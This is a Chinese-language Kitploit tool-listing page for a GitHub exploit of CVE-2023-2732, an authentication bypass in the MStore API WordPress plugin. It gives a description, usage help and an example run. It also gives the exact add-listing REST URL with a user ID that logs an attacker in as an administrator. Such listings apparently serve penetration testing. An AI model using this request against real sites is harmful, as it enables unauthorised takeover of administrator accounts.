Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-2732 — MStore API <= 3.9.2 - 身份验证绕过 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2023-2732
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubrandomrobbiebf/cve-2023-2732

CVE-2023-2732

MStore API <= 3.9.2 - 身份验证绕过

查看仓库
673年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-2732

MStore API <= 3.9.2 - 认证绕过

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mstore-api/mstore-api-392-authentication-bypass

描述

root@kitploit:~
用于 WordPress 的 MStore API 插件在版本 3.9.2 及以下存在认证绕过漏洞。这是由于在通过插件进行添加列表 REST API 请求时,对提供的用户验证不足。这使得未认证的攻击者能够以站点上任何现有用户(如管理员)的身份登录,只要他们知道用户 ID。

帮助

root@kitploit:~
usage: mstore-api.py [-h] -u URL

options:
  -h, --help         显示此帮助信息并退出
  -u URL, --url URL  WordPress 站点的 URL

示例用法

root@kitploit:~
python3 mstore-api.py -u http://wordpress.lan

插件版本低于 3.9.3。
选择一个用户:
1. admin
输入用户 ID:1

恭喜,已发现易受攻击的系统。

如何利用:

访问以下 URL:http://wordpress.lan/wp-json/wp/v2/add-listing?id=1
访问 http://wordpress.lan,您应该会以所选用户的身份登录。
下载工具